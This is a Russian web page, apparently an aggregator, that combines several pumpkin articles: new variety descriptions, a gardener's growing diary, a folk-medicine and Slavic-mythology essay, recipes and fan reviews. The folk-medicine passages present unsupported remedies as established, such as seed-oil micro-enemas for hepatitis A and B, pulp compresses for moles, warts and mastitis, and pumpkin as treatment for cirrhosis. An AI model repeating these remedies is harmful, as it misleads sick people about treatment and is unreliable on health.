10 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

О барыне тыкве замолвите слово

О тыкве румяной замолвите слово

В настоящее время известны десятки видов тыквы. Российские огородники возделывают три вида – твердокорую, крупноплодную и мускатную.

Тыква твердокорая – наиболее холодостойкая и скороспелая, ее ярко-оранжевые плоды очень привлекательны. Однако по вкусовым качествам мякоти она уступает своей крупноплодной родственнице.

Тыква крупноплодная формирует крупные шаровидные плоды с неодревесневающей корой серого цвета и толстой сладкой бело-желтой или оранжевой волокнистой рыхлой мякотью. Многие годы этот вид использовался как кормовой.

Оба вида, тыквы твердокорая и крупноплодная, подходят для выращивания во многих регионах нашей страны. Тыква мускатная очень требовательна к теплу, поэтому растет только на юге.

При посеве сразу в грунт тыква успевает вызреть только южнее Воронежа и Белгорода, в регионах, расположенных севернее, эту культуру выращивают только через рассаду. Семена высевают не позднее 30 апреля, а в открытый грунт рассаду отправляют после того, как минует угроза заморозков. Тыква – настоящая барыня на грядке: ей важен простор, поэтому растения нужно высаживать на расстоянии не менее 1 м.

Пасленовые (баклажан, перец, томат, картофель) и бобовые культуры, а также свекла, морковь капуста и лук – хорошие предшественники для тыквы. После своих родственников – огурца, кабачка, патиссона – тыква растет плохо.

Если тыква растет на компостной куче или высокой утепленной грядке, хорошо заправленной удобрениями, то во время вегетации растений можно обходиться без подкормок. Уход сводится к рыхлениям почвы и удалению сорняков. Чрезмерное увлажнение почвы негативно сказывается на плодоношении, так как растения наращивают мощную вегетативную массу, а цветение при этом задерживается. Плоды в таких условиях накапливают мало сахаров, каротина и сухих веществ.

Сбор урожая проводят осенью. Плоды твердокорой и крупноплодной срезают, когда начинает усыхать плодоножка и кора становится твердой. Не беда, если плоды крупноплодной тыквы не успели вызреть «на корню», это произойдет во время хранения. После уборки на 1–2 недели их нужно поместить в теплое место: за это время лишняя влага испарится, а мякоть запасет сахара.

В нынешнем году в Государственный реестр селекционных достижений России включены новые сорта тыквы крупноплодной.

Учики кури – среднеранний сорт. Плод темно-оранжевый, округлый с выпуклым основанием и плоской вершиной, гладкий, небольшого диаметра. Масса плода – 1–1,5 кг. Мякоть темно-желтая, хрустящая, средней толщины, средней плотности и средней сочности, хорошего вкуса. Урожайность – 2,6 кг с 1 кв. м. Плоды сохраняют товарные качества в течение 100 дней после съема.

Розовый поросенок – среднеспелый сорт, как и предыдущий, формирует плетистое растение. Плод эллиптический, с выпуклым основанием и выпуклой вершиной, диаметр среднего размера, очень длинный, светло-розовый, без рисунка, гладкий. Масса плода – 6–9 кг (максимальная – 16 кг). Мякоть желтая, распадающаяся на волокна, средней толщины, средней плотности, средней сочности. Вкус хороший и отличный. Урожайность – 4,6–5,1 кг с 1 кв. м. Плоды сохраняют товарные качества в течение 90 дней.

Внесены в список и сорта-новинки тыквы твердокорой.

ГЛ рустикап F1 – среднеспелый гибрид, формирующий полуплетистое растение со слабым ветвлением. Плод широкоэллиптический, гладкий. Окраска фона незрелого плода темно-зеленая с белыми точками и частыми пятнами, при созревании переходит в темно-оранжевую с рисунком в виде прерывистых темных полос. Масса плода – 4–5 кг. Мякоть желтая, средней сочности и средней плотности. Вкус хороший. Урожайность – 4,9 кг с 1 кв. м (до 14 кг с 1 кв. м). Плоды сохраняют товарные качества 60 дней.

Сладкая фея – среднепоздний сорт. Плод округлый, сильноребристый. Окраска незрелого плода зеленая с белыми точками, при созревании переходит в желтую с рисунком между ребрами в виде зеленых прерывистых полос. Масса плода – 5–6 кг (до 9 кг). Мякоть желтая, крахмалистая, средней плотности, средней сочности, хорошего вкуса. Урожайность – 3,7–4,1 кг с 1 кв. м. Плоды сохраняют товарные качества 90–120 дней.

Самой «богатой» на новинки в нынешнем году оказалась тыква мускатная.

Сибирская малышка – среднеспелый сорт. Плод плоскоокруглый, с короткой шейкой, диаметр средний, гладкий до слабосегментированного. Незрелый плод зеленый, зрелый – темно-оранжево-коричневый с восковым налетом. Масса плода – 2–2,5 кг. Мякоть оранжевая, средней толщины, хрустящая, плотная, средней сочности. Вкус отличный. Урожайность – 5,1 кг с 1 кв. м. Плоды сохраняют товарные качества 110 дней.

Иришка – среднепоздний сорт. Плод цилиндрический, средней длины или длинный, сегментированный, желобки мелкие или средней глубины. Незрелые плоды зеленовато-коричневые с рисунком в виде светло-зеленых пятен, зрелые – коричневые со светлыми пятнами. Масса плода – 1,5–2,5 кг. Мякоть оранжевая, тонкая или средней толщины, хрустящая, распадающаяся на волокна, средней плотности, средней сочности. Вкус отличный. Урожайность – 4,8–5 кг с 1 кв. м. Плоды сохраняют товарные качества 180–230 дней.

Медовый пирог формирует плоский, небольшого диаметра, сегментированный плод с глубокими желобками. В незрелом виде он темно-зеленый, в зрелом – коричневый с восковым налетом. Масса плода – 6–9 кг. Мякоть оранжевая, средней толщины, средней плотности, средней сочности. Вкус отличный. Урожайность – 3,8–4,2 кг с 1 кв. м. Плоды сохраняют товарные качества 90–120 дней.

Шахерезада, как и предыдущий сорт, относится к позднеспелым. Плод булавовидный со слабым изгибом, очень длинный, среднего диаметра, сегментированный, желобки мелкие, незрелый – темно-зеленый, зрелый – оранжевый с широкими зелеными прерывистыми полосами. Масса плода – 6–8 кг (максимальная – 12 кг). Мякоть оранжевая, средней толщины, хрустящая, плотная, сочная. Вкус отличный. Урожайность – 5,9–6,2 кг с 1 кв. м. Плоды сохраняют товарные качества 90–120 дней.

О барыне-тыкве замолвите слово

Ну вот, я все-таки решилась написать про тыкву. В нашей семье так и не полюбилась она никому, хотя в полезности ее свойств никто и не сомневается. Каждый год пробую сажать новые сорта в надежде, что одна из них покорит мое сердце и прочно войдет в наш дом.

И этой весной все повторилось.
Набрала разных семян, правда, перед этим прочитав много положительных отзывов садоводов-огородников. Когда пришло время сеять, поняла, что все это богатство не уместится на моих сотках, поэтому остановилась на 4 сортах.
Это Тыква Дюшес, Цукат, Пастила-Шампань и Марина из Киоджа.

Раньше я сажала тыкву двумя способами: рассадным и семечкой сразу в землю.
Сейчас, в основном, использую рассадный. Поэтому семена сажаю в горшочки в 20-х числах апреля и ставлю их в поликарбонатную теплицу. На 5-8 день замечаю, что семечко проросло. Уже на 20-25 день у рассады появляется третий листик, и тогда я высаживаю ее в ОГ.
В подготовленную ямку кладу немного компоста и куриного помета. Поливаю и ставлю дуги. Накрываю временно спанбондом, так как вечерами и ночами бывает еще холодно. Знаю, что желательно сажать тыковки друг от друга на расстоянии 1 метра, но мне приходится высаживать чаще. Тыква любит полив и не любит холодную воду. Подкармливаю настоем сброженной травы и бражкой с добавлением куриного помета.

Мы все знаем, что тыква имеет питательную ценность. Ученые обнаружили в ней редкий витамин Т и К. Один из них способствует отличному усвоению тяжелой пищи. Кроме того, в тыкве много микроэлементов.
А какая низкая калорийность. Всего 22 калории в 100 граммах!

Обычно формирую тыкву в один или два стебля. На главной плети оставляю два плода, на боковой один, затем после плодиков идут 2-3 листа, которые тоже оставляются, а вся остальная верхушка удаляется. В этом году столкнулась с тем, что некоторые завязи загнивали. Поняла, что это связано с плохой погодой и, прочитав на нашем сайте советы, решила искусственно опылить цветки тыквы. Но тут на глаза попалась маленькая баночка меда, которую я тут же развела в воде и побрызгала все цветочки. После этого с плодами все было отлично.
Итак, хочется написать про каждую тыковку отдельно

1. Цукат

«Лежу, хорошею, теплом набираюсь.
Расту и круглею, ну, вообщем, стараюсь!
Вот только беда — скучно мне в огороде.
Уйти бы гулять, да не выросли ноги»

Вот эти 3 оранжевые — сорт Цукат:

2. Пастила-Шампань

Семена от Биотехники. Вкусное название, раннее. Форма вытянутого эллипса. Обещают, что мякоть будет занимать почти все внутреннее пространство и имеет ванильный аромат.
Ну что… попробуем. Один плодик у меня оторвался еще в конце июля и дозаривался на окошке. Вот видно, что у него окрас более насыщенный, но он маленький.

Этим летом было много дождей, поэтому, чтобы тыквы не подгнили, кладу под них дощечки

3. Марина из Киоджа

Семена от Биотехники Признаюсь, что на эту тыкву я возлагаю большие надежды. А из Вас друзья, кто-нибудь сажал такую?
Вот что гласит описание этого сорта: «Эта тыква считается одной из самых причудливых и уникальных тыкв Италии» Легенда гласит, что море подбросило жителям Киоджа — небольшого рыбацкого городка на севере Италии тыкву — наследие моря. Итальянцы называют эту тыкву Морским чудовищем.»
Сорт этот средне-поздний. Плоды с морщинистой коркой. Может храниться более года. Я же уже увидела один недостаток в этой тыковке. Чистить ее будет очень неудобно, но если вкус будет отменным, то прощу ей такие мелочи.

«Похожей так хочется стать на девчонку —
носить сарафан, иль хотя бы юбчонку»

Чем-то похожа на декоративную… правда? Вот такая у меня была декоративная

Ну что ж, попробуем.

4. Дюшес

Хотелось посадить и маленькие тыковки. Семена от Русского огорода.
Плоды имеют декоративный вид… да и обещают отменный ореховый вкус. Раннеспелые.

Обычно тыквы у меня хранятся максимум до февраля. А вот одна из них, которую я сажала пару лет назад, досидела до мая… возможно и дольше бы долежала. Называется «Медовая принцесса»
Смотрите… не усохла, не подгнила, а во время разреза был какой-то арбузный запах. Снимала ее зеленой, а во время лежки приобрела сначала апельсиновый цвет, а затем и золотисто-коричневый

Ну, в завершение можно сказать о болезнях тыквы.
Мучнистая роса. В прошлом году я снимала тыквы, а листьев практически не было… они все были поражены мучнистой росой и почти засохли. А в этом листья до сих пор зеленые. Слизней в этом году тоже достаточно. Знаю, что они могут нанести большой вред тыковке, которая почти готова, но еще лежит и нежится, пока хозяин ее начнет убирать. Поэтому, как могла, боролась с ними.

«Там, на солнышке сверкая, дремлет тыква золотая
И растет, растет, растет, заполняя огород!
Если солнце припечет, если дождичек польет,
То одной огромной тыквы хватит нам на целый год!
Будем жарить, печь, томить. Будем кашу с ней варить.

Благодарю всех за внимание. Удачи всем на ваших замечательных дачках.

О барыне тыкве замолвите слово

В русской народной традиции тыква занимала не последнее место не только в кулинарии, но и в целительстве, а также у западных славян участвовала в различных магических практиках.

Полезные свойства тыквы

В страве (осознанном приготовлении и принятии пищи) она ценилась, как и в современной кулинарии, за богатый набор витаминов группы В, источник каротина, йода, магния и т.д.

Продукты и блюда из тыквы обладают антисептическими, антипаразитарными свойствами, выраженным желчегонным эффектом, причем достаточно мягким, поэтому ее употребление рекомендуется даже при желчекаменной болезни.

Также она снижает уровень холестерина в крови, относится к диетическим продуктам, способствующим нормализации обмена веществ и снижению веса. Масло, получаемое из ее семян, способствует нормализации работы печени и используется в лечебных процедурах в качестве микроклизм, а также употребляется внутрь натощак при гепатитах А, В.

В русской кулинарии тыква использовалась в овощных блюдах, в салатах – в сыром, жареном и пареном виде, для приготовления холодных и горячих супов, мазунь, левашей (повидла), для приготовления пастилы, напитков (сбитней, квасов, компотов), небольшие плоды использовали в качестве формы, в которой запекали овощи, мясо, каши, приобретающие при этом специфический и очень оригинальный вкус. Такие блюда часто были украшениями праздничного или воскресного стола.

Секреты приготовления осенних блюд, рецепт Московского сбитня, солянки и гурьевской каши в мастер-классе «Русский осенний стол».

Мякоть с семенами, которую люди беспечно выбрасывают, так же активно использовалась в целительстве: в сыром виде в качестве компрессов на «шпоры» на ногах, болезненные мозоли, натоптыши, трещины на пятках, на «растущие косточки» (на ночь, компресс под пленку), в распаренном виде вместе с семенами, с добавлением горчицы и меда – в качестве компрессов на воспаленные суставы, при остеохондрозе; без горчицы, но с медом – на грудь у женщин в случае маститов, мастопатии, застоях молока.

Основная, съедобная мякоть активно использовалась в косметологии: для приготовления масок для увядающей кожи, в составе с некоторыми травами, для выведения пигментных пятен, для выведения бородавок и родинок. Для приготовления масок и мыла для улучшения роста волос, укрепления ногтей (с яблочным соком).

Что символизирует тыква

В мифологическом аспекте ТЫКВА являлась растением богини Живы, которая была так же связана со стогной (чакрой) Живот и отвечала не только за земное и человеческое плодородие (ее праздник Осенины 22 – 24 сентября), но и, являясь супругой Даждьбога, то отвечала за достаток, в самом широком понимании этого слова.

Именно поэтому у западных славян тыква становилась и символом сватовства (изначально, и лишь затем при забытье традиций стало символом отказа — фильм «Трембита», главная героиня дарила «Гарбуза» в качестве отказа жениху).

Магия тыквы

У болгар тыква в засушенном виде, ее цветы и семена часто использовалась в магии увеличения достатка, в обрядах на удачную торговлю, в призвании дитя (3 тыквенные семечки носить возле чрева).

И вспомним праздник Хеллоуина, где тыква – один из главных элементов обряда. Он празднуется в западных странах с 31 октября на 1 ноября.

Это является поздней интерпретацией и видоизменением обрядового действа, символизирующего противостояние 2-х сестер, богини Живы (символ уходящего аграрного года, уходящего света, благодати – символ тыква и свет свечи) и богини Мары, которая отвечала, за наступающее время тьмы, испытаний, очищения, время, когда мы все проверяемся на духовную крепость, в случае недостатка которой в ее время нашими душами могут овладеть различные болезни, морок, иллюзии – злые «силы» (ее символы – злобные страшилища и карнавальные маски праздника Хеллоуин).

Изначально в этом обряде тыква использовалась не только как подсвечник, впрочем, не содержащий никаких устрашающих личин, но также подарком и украшением дома, как символ накопленной за лето благодати, жизни, которую почитают в данном доме.

Обычай дарить тыкву в данный день считалось хорошей приметой, ибо с ней ты даришь частичку света, радости и тепла.

Как использовали тыкву наши предки

Тыква — королева осени. Обычно она созревает в сентябре, однако поздние сорта дают урожай и в конце октября. Именно поэтому ее нередко называют и «последним овощем» в огороде.

Тыква отлично хранится в сухом и прохладном месте в течение нескольких месяцев: приготовить ее можно даже к новогоднему столу.

Тыкву выращивают повсюду, кроме пояса вечной мерзлоты, а потому в кухнях многих стран и народов есть не один десяток традиционных блюд из нее. Например, в Казахстане готовят манты с тыквой, в Узбекистане — молочный суп с тыквой (ширкавак), итальянцы добавляют тыкву в ризотто, в Австрии из нее делают шнапс, а в Индии — халву.

На Руси тыкву называли барыней, а традиционным блюдом с ней была каша. Кашу с тыквой можно варить на воде, молоке или сливках. Вместе с кусочками тыквы в каши можно смело добавлять сухофрукты.

Идеально сочетается тыква с пшеном и рисом, но хорошо ведет себя и со всеми остальными крупами и бобовыми. Не избегает тыква и такой необычной крупы, как кускус. Сегодня эта магрибская крупа невероятно популярна в мировой кулинарии: блюда с ней готовят в самых престижных ресторанах.

Использование тыквы в кулинарии

Рецепт. Кускус с тыквой, сыром и пряностями

Ингредиенты: 50 г кускуса, 5 столовых ложек молока, 2—2,5 столовых ложки тыквенного пюре, 20—30 г сыра гауда, мед, а также по щепотке разных пряностей — имбирь, мускат, корица, кардамон.

Приготовление: Для получения тыквенного пюре тыкву необходимо запечь в духовке, а потом размять. Кускус отварить в течение 5 минут. Воду слить.

Добавить к крупе тыквенное пюре, пряности, влить молоко, перемешать, довести до кипения, снять с огня и дать настояться под крышкой 10 минут. При подаче посыпать кускус с тыквой тертым сыром и слегка полить медом.

Салаты и закуски из тыквы

Салаты и закуски из тыквы можно приготовить как для сладкоежек, так и для любителей острых ощущений. Для «сладких» салатов тыкву можно использовать в сыром виде, она гармонирует с морковью, яблоками, орехами и медом.

Вареная или запеченная тыква хороша в сытных мясных салатах, а также салатах с морепродуктами. Вкус у тыквы мягкий, поэтому она отлично сочетается с пряностями (тимьяном, шафраном, мятой, розмарином) и восточными смесями.

Рецепт. Маринованная тыква по-корейски

Ингредиенты: 500 г тыквы, 2 зубчика чеснока, 1 луковица, 2 столовых ложки растительного масла, 1 столовая ложка меда, 2 столовые ложки яблочного уксуса, 2 чайные ложки приправы для морковки по-корейски, соль по вкусу.

Приготовление: Тыкву очистить, натереть на средней терке. Лук порезать и обжарить на растительном масле до золотистого цвета. Переложить лук в миску с тыквой, перемешать.

Туда же добавить мелко нарезанный чеснок, мед, уксус, приправу и соль. Все хорошо перемешать, переложить в банку и прикрыть крышкой. Убрать закуску в холодильник на 4 часа.

Основные блюда из тыквы

Тыкву отличает особо покладистый характер. Она выдерживает все кухонные манипуляции, какие только возможны: варку, тушение, обжаривание, запекание, пюрирование, фарширование.

В результате кулинарных метаморфоз в мире появилось огромное количество первых и вторых блюд из тыквы. Тыква хорошо разваривается, поэтому в супах-пюре она просто бесценна. В супах тыква сочетается с мясом и птицей, грибами, овощами и фруктами.

Впрочем, несмотря на удачных компаньонов, тыква самодостаточна: запеченная в духовке сама по себе, она вкусна и ароматна. Но самым сытным и хитовым блюдом считается тыква с мясом. Беспроигрышный вариант — готовить мясо прямо в ней, убрав предварительно волокна и семечки и используя срезанную макушку с хвостиком в качестве крышки.

Выпечка с тыквой

Для приготовления мучных блюд особенно подходят зимние сорта тыквы — их мякоть более плотная и сладкая. Закусочные пироги и пирожки с тыквой, хлеб, печенье, рулеты, торты, вафли — тыкву можно добавить куда угодно.

И что немаловажно: выпечка из тыквы привлекательна не только на вкус, но и цвет! Желто-оранжевые булочки, бисквиты и коржи способны подарить тепло и поднять настроение в холодное время года.

Рецепт. Кексы из тыквы

Ингредиенты: 300 г очищенной тыквы, 250 г муки, 150 г сливочного масла, 150 г сахара, 3 яйца, 1 лимон, 2 чайные ложки разрыхлителя.

Приготовление: Натереть тыкву на средней терке (сок слить). С лимона снять цедру, а затем выжать сок — понадобится около 50 мл лимонного сока. Масло растереть с сахаром, добавить яйца, перемешать. Добавить лимонный сок и цедру, перемешать. Добавить тыкву и хорошо перемешать. Добавить муку и разрыхлитель, замесить тесто. Тесто не должно быть очень густым. Тесто выложить в формочки для кексов (заполнять тестом формочки следует не полностью). Выпекать в разогретой до 180 градусов духовке около 30 минут.

Примечание. Готовые кексы можно посыпать сахарной пудрой или кокосовой стружкой.

Рецепт из тыквы. Тыквенный татен с апельсином

Ингредиенты: (для теста) 200 г муки, 100 г масла, 6 столовых ложек холодной воды; (для начинки) 500 г очищенной тыквы, 150 г сахара, 50 г сливочного масла, 2 столовых ложки апельсинового сока, цедра половинки апельсина.

Приготовление: Замесить тесто из муки, масла и холодной воды, убрать тесто в холодильник на полчаса. Тыкву нарезать кусочками и посыпать ее смесью из 25 г сахара и мелко натертой цедры.

В форме для выпечки или сковороде, которую можно поставить в духовку, растопить масло, посыпать его равномерно оставшимся сахаром и довести до светло-коричневого оттенка (очень важно не передержать сахар!).

Выложить ровным слоем тыкву на приготовленную карамель, полить апельсиновым соком и поставить форму в разогретую до 200 градусов духовку на 15 минут.

В это время раскатать тесто и накрыть им полуготовую тыкву, загнув края теста вниз. Снова поставить в духовку и выпекать еще 30 минут (тесто должно подрумяниться). Дать готовому пирогу постоять 5 минут, а затем перевернуть его на блюдо. Делать это нужно осторожно, что не обжечься горячим сиропом.

Примечание. Для этого блюда можно использовать и готовое слоеное тесто (250 г). К тыкве можно добавить корицу или яблоки.

Домашние заготовки из тыквы

Самый простой и быстрый способ заготовить тыкву впрок — это заморозить ее. Для этого нужно тыкву очистить, порезать на куски и разложить в полиэтиленовых пакетах в морозилке, там она может храниться от 6 месяцев до года.

Однако если проявить кулинарную инициативу, то можно приготовить из тыквы вкусные «зимние» салаты или законсервировать ее в яблочном или облепиховом соке. При этом сохраняются почти все ее полезные свойства.

В одной банке тыква прекрасно соседствует с помидорами, болгарским перцем, морковью и кабачками. По аналогии с ближайшим родственником — кабачком — из тыквы делают икру.

Рецепт. Зимний салат из тыквы с болгарским перцем

Ингредиенты: 1 кг тыквы, 1 литр свежих измельченных помидоров, 500 г сладкого перца, 200 г моркови, 200 г лука, 1—2 острых перца, полстакана растительного масла, 100 г сахара, 1 столовая ложка 70-процентной уксусной кислоты, 2—2,5 столовые ложки соли.

Приготовление: В половине масла обжарить морковь и лук. Томатную массу довести до кипения и варить 20 минут. Добавить к измельченным томатам лук с морковью, оставшееся масло, соль, сахар.

Добавить нарезанную крупными кусочками тыкву, сладкий и острый перец. Варить еще 30 минут. В самом конце приготовления добавить уксус. Салат разлить по горячим стерилизованным банкам. Банки закатать, перевернуть и укутать до полного остывания.

Десерты и напитки из тыквы

Из сладких сортов тыквы получаются очень вкусные цукаты, мармелад, джем, повидло и варенье. Причем готовить подобные сладости можно в самых различных вариациях, поскольку тыква отлично сочетается с фруктами, особенно цитрусовыми, и ягодами.

Рецепт. Варенье из тыквы

Ингредиенты: 1 кг очищенной тыквы, 800 г сахара, 1 апельсин, 1 стакан облепихи.

Приготовление: Лучше всего брать для варенья зрелую желтую тыкву. Тыкву очистить от кожуры, внутренней мякоти, нарезать кубиками 1,5х1,5 см.

Очистить апельсин, порезать его на мелкие кусочки. Облепиху вымыть, перебрать, протереть через сито. Тыкву, апельсин и облепиху выложить в кастрюлю с толстым дном и засыпать сахаром.

Оставить на пару часов, за это время смесь должна дать сок. Затем поставить кастрюлю на медленный огонь и варить варенье в течение 30 минут, периодически помешивая.

Цвет у варенья должен быть янтарно-прозрачным, а кусочки тыквы должны остаться целыми. Варенье разлить в стерилизованные банки и закатать.

В продолжение «сладкой» темы, стоит вспомнить о напитках из тыквы. Тыквенные соки, морсы, компоты, отвары, кисели так же ароматны, как и полезны.

Рецепт. Смузи из тыквы с корицей

Ингредиенты: 600 г неочищенной тыквы, 3 крупных лимона, 1 грейпфрут, ½ чайной ложки молотой корицы, мед по вкусу.

Приготовление. Тыкву разрезать, удалить семена, мякоть очистить от кожицы и нарезать кусочками. Отварить тыкву (на пару или в воде) в течение 10—15 минут, затем воду слить, тыкву охладить, измельчить в блендере и всыпать молотую корицу.

Из лимонов и грейпфрута отжать сок, влить в тыквенное пюре. При желании добавить мед по вкусу. Смесь взбить блендером до образования пышной однородной массы. В низкие стаканы положить кубики льда, влить приготовленный смузи и сразу подавать.

Кулинарные истории, часть 13 — ода ТЫКВЕ, тыквенные истории или искренняя благодарность Любе

Здравствуйте, дорогие друзья!

Я очень трепетно отношусь ко всему живому вообще, и к растениям в частности, особенно — как северный человек — к овощам, выращенным на огороде.

Вот взять, к примеру, тыкву. Чудесный овощ.


Речь пойдет именно о ней.

Но начну с главного.

С благодарности дорогой Любаше (Vishnja), которая презентовала мне чудный рецепт с тыквой.
Этот материал Я ПОСВЯЩАЮ ЛЮБЕ, которая абсолютно также ОБОЖАЕТ ТЫКВУ, КАК И Я.


Это понятно по её рецептам.

1. Подарочный рецепт «Тыквенные пирожные со сметанным кремом».
https://www.povarenok.ru/recipes/show/135565/

Думаете, это пирожное?
Неееет, это изысканный десерт!

Люба, вот честно, я была в восторге. Всем, кто попробовал, очень понравились пирожные.
Это вот как раз тот случай, когда результат превзошел ожидания.

С украшением пошла на хитрость – вырезала сырую тыкву, в итоге были готовые украшения – красивые и целенькие.

Папа, когда увидел

пирожные на столе, после молчаливой паузы изрек: «Даааа, это конечно шЭдЭвр!»

Комментарий по поводу теста. Кто-то в комментариях пишет, что, мол, тесто-то не пропеклось! А ничего подобного!
Ниже привожу фото (фотографировала специально) где пирожное разрезано ножом и разломано руками. Да, это не бисквит, но все прекрасно пропекается. И тыква в нежной консистенции теста находится в полной гармонии с другими ингредиентами, в частности – медом.

Любочка, моя благодарность за столь необычный, красивый и полезный десерт.

2. Тыква с мандариновым соусом. Это другой рецепт.
https://www.povarenok.ru/recipes/show/123524/
Тоже изумительно вкусный десерт. В особенности понравился соус. Спасибо большое.

И ТЕПЕРЬ НЕМНОГО О ТЫКВЕ.

ТЫКВА на Руси появилась в XVI веке. А родиной принято считать Америку. Хотя есть данные о происхождении её из Китая.

Интересные факты из жизни тыквы:
В Центральной Азии из тыквы изготовляют сосуды для напитков и клетки для мелких певчих птиц.

Тыква фермера из США, выращенная в 2010 году, потянула на 821,2 кг (!)

и, таким образом, установила новый мировой рекорд, официально подтверждённый книгой рекордов Гиннеса.

Ацтеки употребляли в пищу вареные цветки и оконечности плетей тыквы (зачем.

Ведь есть сама тыква!)

Мой папа (а он, как известно, мастер на все руки) с успехом выращивает её.
Чем же она мне полюбилась?

Во-первых, за внешний вид, цвет и форму — красавица!

фото из интернета

Некоторые фото с огорода

А эта фотография тоже заслуживает внимания — конкурсно-выставочные работы на день района (с. Мошенское Новгородской обл.) в 2014 году — прекрасный был праздник.

Во-вторых, за вкус (недоумеваю, что он многим не нравится, но понимаю, что на вкус и цвет товарища нет).

В-третьих, кладезь питательных веществ — каротина (провитамина А, каротин превращается в организме в сам витамин), фолиевой кислоты, калия, кальция и железа.

В-четвертых, из неё можно приготовить множество оригинальных, а, главное, полезных блюд, не зацикливаясь на пшенной каше с тыквой. Уникальное достоинство — саму тыкву можно использовать в качестве емкости для еды. В какой еще овощ можно залить пол-литра супа или положить внушительную порцию второго?

В-пятых, за семечки. Помимо вкуса как такового, с успехом используется в медицине (противоглистное) и косметике (тыквенное молочко. Правда, сама не пробовала, добрые люди рассказывают). Семена — прекрасный источник цинка.

И вот чуть не забыла, в-шестых, существуют очаровательные декоративные тыковки, которые, безусловно, являются украшением садов, огородов и, в последствии, интерьеров наших домов. Я сама выращивала такие летом 2015-го года и с успехом украшала ими интерьер кухни. А несколько штучек ушло на подарочки…

Эта фотография из интернета

А это — мои, украшение интерьера. Срок «службы» таких тыковок — 1 год и 3 месяца плюс/минус.

Рада, что заглянули ко мне и если мой отчет понравился.
НАДЕЮСЬ, ЧТО ПОЧЕРПНУЛИ ДЛЯ СЕБЯ ЧТО-ТО НОВОЕ И ИНТЕРЕСНОЕ.

Овощи Тыква — отзыв

О, божественная тыква! Как можно не преклоняться перед тобой? Мои оды и воздания должного тыкве, а также разнообразные яства из нее

Приветствую гостей отзыва!

О тыкве я хотела написать давно, еще год назад, но все казалось, что поспешу и выложу недоделанный отзыв. Ведь мало просто написать о тыкве, надо уделить внимание нюансам, потому, что тыква тыкве рознь и различаются они по вкусу колоссально. Сорта играют решающую роль. В этом году мое семейство выращивало несколько сортов тыквы, и я познакомилась с тыквой, напоминающую по аромату дыню, с тыквой, которая по вкусу, как картошка, с тыквой до боли напоминающей кабачок. Каждый сорт подходит для определенного блюда и если перепутать и взять, допустим, для фаршированной тыквы сорт, подходящий для тыквенных оладий, то по вкусу может быть глобальное разочарование. Вообще считаю, что не бывает невкусной тыквы, бывает неумелое ее приготовление. У меня самой были промашки, когда я делала блюдо не из того сорта, а потом фыркала и воротила нос, хотя надо отдать должное, что истинные любители тыквы (из моих домашних) такие детали не различали и уминали любые блюда с ней, несмотря на то что я считала их провальными.

Немного о пользе тыквы

Не хочу сейчас ударяться в известное и очевидное, но, тем не менее, отмечу, что тыква содержит немного калорий и богата множеством полезных веществ.

  • углеводы, белки;
  • глюкоза и сахароза;
  • фруктоза;
  • пектиновые вещества;
  • соли калия, кальция, железа, магния, фосфора, кремния;
  • клетчатка ( благодаря ей тыква очень полезна для организма);
  • много витаминов группы В, С, Е, D;
  • никотиновая кислота;
  • каротин.

Тыква подойдет и для худеющих и для любителей хорошо покушать. Также тыкву назначают для тех, кто страдает:

  • гепатитом и желчно-каменной болезнью;
  • энтероколитами;
  • хроническими колитами;
  • пиелонефритами нефритами;
  • циррозом печени;
  • хроническим гепатитом;
  • острыми и хроническими циститами.

Как чистить и хранить

Здесь буду банальной. Чистить надо аккуратно. Кожура толстая, нож легко может соскользнуть и поранить.

Если тыква целая, то храните в сухом месте.

В комнате, где нет места влажности. И забудьте про балкон сейчас, когда там холодно. Я по дурости оставляла тыкву на балконе и получала полностью убитый продукт. Внутри развивались гнилостные бактерии (внешний вид об этом красноречиво заявлял) и тыкву приходилось выбрасывать.

Если тыква разрезанная, то значит хранить в холодильнике. Можно и в морозилке.

Что приготовить из тыквы

Я всегда мечтала попробовать тыкву фаршированную фаршем. Благодаря маме поняла, что лучше всего ее делать с сортом вроде турецкого тюрбана. Демонстрирую вам, как сорт выглядит на фото.

Эта тыква отличается тем, что по вкусу очень напоминает картошку, и если вы захотите просто потомить ее, допустим с медом, в качестве десерта, то получится далеко не самое удачное кулинарное творение. Зато такая тыква безупречно сочетается с мясным наполнителем, то бишь с фаршем. Для приготовления я полностью вычищаю внутренности тыквы, оставляю внешнюю оболочку вместе с кожей и мякоть изнутри. Убираются семечки и сердцевина. Потом фаршируете тыкву по своему вкусу, я брала просто соленый сырой фарш без риса, и ставите в духовку. Под конец приготовления можно посыпать тертым сыром.

Готовится час. Получается умопомрачительно вкусное блюдо. У нас дедушка ел и урчал словно кот, а я еле сдерживалась, чтобы в тон не замурлыкать от удовольствия. Еще бы ведь это нежная тыква, тающая во рту, с картофельным оттенком и мяско гармонично дополняющее ее.

Пробовала тоже самое блюдо повторить, но брала зеленую тыкву и осталась недовольна. Вкус резко ухудшался.

Зеленая тыква идеально подходит для тыквенных оладий или кабачково-тыквенных.

А теперь перейдем к яркой оранжевой красавице с дынным ароматом.

Из нее можно приготовить массу вкусных блюд, но лучше всего получаются десертные кушанья.

Например, можно запечь порезанные кубики с тыквой вместе с сахарной пудрой, а после приготовления залить несколькими ложками ароматного меда.

Можно испечь кекс с добавлением тыквенного пюре.

Рецепт берете любой, какой вам по вкусу, главное не забыть добавить туда тыкву.

Также с этой тыквой получается изумительно нежный тыквенный суп пюре со сливками.

Готовить его элементарно. Отвариваете кусочками порезанную тыкву (можно к ней добавить картофель и морковку, как пожелаете), потом взбиваете ее блендером, заливаете сливками и доводите до кипения. К супу подаются хрустящие гренки.

Делала также пасту с тыквенным-чесночным соусом.

Так что совсем немного фантазии и вкус тыквы может преображаться в разную сторону. Даже если вы совсем-совсем не любите тыкву, то можно позволить себе обмануться и делать кушанья из этого яркого овоща, совершенно не чувствуя его характерного привкуса.

Пирог с тыквенно-апельсиновой начинкой

И, напоследок расскажу о том, как изумительно перевоплощается тыква в сочетании с апельсинами. Тыквенно-апельсиновое варенье делается просто. Режете тыкву кусочками, засыпаете сахаром и даете ей настояться пару часиков. Потом ставите на мелкий огонь и минут двадцать томите в получившемся сиропе (воды добавлять не надо). В это время с помощью блендера измельчаете апельсиновую цедру и сочную мякоть цитруса. И смешиваете все вместе. Я предпочитаю после смешивания еще раз взбить блендером, чтобы получилась более менее однородная масса. Тыквенный аромат испаряется, несмотря на то, что тыквы больше, чем апельсина. Но начинает доминировать апельсин, как во вкусе, так и в запахе. Получившееся варенье я использую как начинку для шоколадного теста. Можно испечь печенюшки, а можно пирог.

